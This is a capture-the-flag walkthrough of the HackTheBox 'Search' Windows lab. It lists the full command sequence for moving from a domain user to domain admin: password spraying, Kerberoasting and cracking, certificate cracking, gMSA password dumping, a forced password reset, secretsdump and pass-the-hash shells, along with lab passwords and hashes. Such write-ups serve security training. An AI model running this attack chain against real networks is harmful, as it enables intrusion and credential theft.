HackTheBox – Search Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -T5 -sCV -p- 10.10.11.129 –Pn
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://search.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,wpad,xlsx,xml,aspx -t 64
http://search.htb/#about-section
http://search.htb/images/slide_2.jpg
Testing this set of credentials using the earlier identified naming scheme using crackmapexec we are able to authenticate to AD and list shares on the machine.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -d search.htb -u hope.sharp -p ‘IsolationIsKey?’ –shares
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
SPN crackable
Since we are not being hunted and we got user credentials we can get a quick overview using bloodhound-python to dump active directory.
┌──(root㉿kali)-[/home/kali/Downloads/BloodHound.py]
└─# bloodhound-python -d search.htb -u hope.sharp -c All -p ‘IsolationIsKey?’ -ns 10.10.11.129
Now import the file to bloodhound software
┌──(root㉿kali)-[/home/kali/Downloads]
└─# impacket-GetUserSPNs search.htb/hope.sharp:’IsolationIsKey?’ -outputfile web_svc_kerberos
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat web_svc_kerberos
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john –wordlist=rockyou.txt web_svc_kerberos
Output:
@3ONEmillionbaby
If we are lucky this might mean that the password is reused by a member of the HelpDesk group. We can get all the recursive group members using bloodhound.
Running crackmapexec against the list of usernames we can see that EDGAR.JACOBS
probably reused his account password to create web_svc
.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -u helpdesk -p ‘@3ONEmillionbaby’ –shares
Checking the users home directory which is in the RedirectedFolders$
smb share we find an interesting looking excel file Phishing_Attempt.xlsx
.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# /usr/share/doc/python3-impacket/examples/smbclient.py ‘search.htb/EDGAR.JACOBS:@3ONEmillionbaby’@search.htb
# shares
# use RedirectedFolders$
# ls
# cd edgar.jacobs
# ls
# cd Desktop
# ls
# get Phishing_Attempt.xlsx
Copying everything with CTRL + A
=> CTRL + C
and pasting it into a new file we see the hidden column contained the password fo the usernames.
Creds
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat creds | awk -F’ ‘ ‘{print $3}’ > passwords
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat creds | awk -F’ ‘ ‘{print $4}’ > users
┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -u users -p passwords -d search.htb –continue-on-success –no-bruteforce
By this we get
SMB search.htb 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
┌──(root㉿kali)-[/home/kali/Downloads]
└─# /usr/share/doc/python3-impacket/examples/smbclient.py ‘search.htb/Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18’@search.htb
# use RedirectedFolders$
# cd sierra.frye
# cd Desktop
# ls
# get user.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Password: $$49=wide=STRAIGHT=jordan=28$$18
smb: \> cd \sierra.frye\
smb: \sierra.frye\> ls
smb: \sierra.frye\> cd Downloads\
smb: \sierra.frye\Downloads\> ls
smb: \sierra.frye\Downloads\> cd Backups
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography Standard #12) encryption. It is used as a portable format for transferring personal private keys and other sensitive information. P12 files are used by various security and encryption programs. It is generally referred to as a “PFX file”.
We can try to upload this certificate to the browser (firefox).
It asks for the password. We can try to crack the password using the bellow tool.
https://github.com/crackpkcs12/crackpkcs12
┌──(root㉿kali)-[/home/kali/Downloads/p12tool]
└─# go run cmd/main.go crack -c /home/kali/Downloads/staff.pfx -f /home/kali/Downloads/rockyou.txt
If you are on VM then it’d take much more time. Now we have the password for the certificate. Let’s add it in our browser.
There is a specific endpoint that you can access with this certificate.
https://search.htb/staff/en-US/logon.aspx
Now we need to input the credentials of ‘Sierra’ user and access PowerShell Console.
Password: misspissy
https://search.htb/staff/en-US/logon.aspx
https://search.htb/staff/en-US/logon.aspx
Username: Sierra.FryePassword: $$49=wide=STRAIGHT=jordan=28$$18
Computer name: Research
┌──(root㉿kali)-[/home/kali/Downloads]
└─# bloodhound-python -u ‘Sierra.Frye’ -p ‘$$49=wide=STRAIGHT=jordan=28$$18’ -d search.htb -v –zip -c All,Loggedon -dc search.htb -ns 10.10.11.129
To domain admin we will go over multiple ways with the first two of them probably being patched by now.
All the ways involve reading the gMSA password of BIR-ADFS-GMSA$
first as sierra.frye
. This user has in turn GenericAll
over Tristan.Davies
who is in the EA/DA/A groups
As we are member of ITSEC, we can read GMSA password.
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB
https://github.com/micahvandeusen/gMSADumper
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# ./gMSADumper.py -u sierra.frye -p ‘$$49=wide=STRAIGHT=jordan=28$$18’ -l 10.10.11.129 -d search.htb
Output:
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-psexec “BIR-ADFS-GMSA$”@search.htb -hashes :e1e9fd9e46d0d747e1595167eedcec0f
gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.
- Reading GMSA Password
- Passwordless PowerShell – How to use gMSAs In Your Scripts
- GMSA Attributes in the Active Directory
msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) – stores the security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
Based on both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access domain admin.$gmsa=Get-ADServiceAccount-Identity‘BIR-ADFS-GMSA$’-Properties‘msDS-ManagedPassword’$mp=$gmsa.‘msDS-ManagedPassword’ConvertFrom-ADManagedPasswordBlob$mp
# GMSA$gmsa=Get-ADServiceAccount-Identity‘BIR-ADFS-GMSA$’-Properties‘msDS-ManagedPassword’$mp=$gmsa.‘msDS-ManagedPassword’$secure=ConvertFrom-ADManagedPasswordBlob$mp
# Credentials$username=“BIR-ADFS-GMSA”;$password=$secure.SecureCurrentPassword;$cred=New-ObjectSystem.Management.Automation.PSCredential-ArgumentList$username,$password;Invoke-Command-ScriptBlock{whoami}-ComputerNameRESEARCH-Credential$cred
Invoke-Command -ScriptBlock
{ net user tristan.davies Password123! /domain
} -ComputerName RESEARCH -Credential
$cred
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# crackmapexec smb search.htb -u tristan.davies -p ‘Password123!’ –shares
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-secretsdump tristan.davies:’Password123!’@search.htb -just-dc-user Administrator
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-wmiexec administrator@search.htb -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6
C:\>whoami
C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
C:\Users\Administrator\Desktop>type root.txt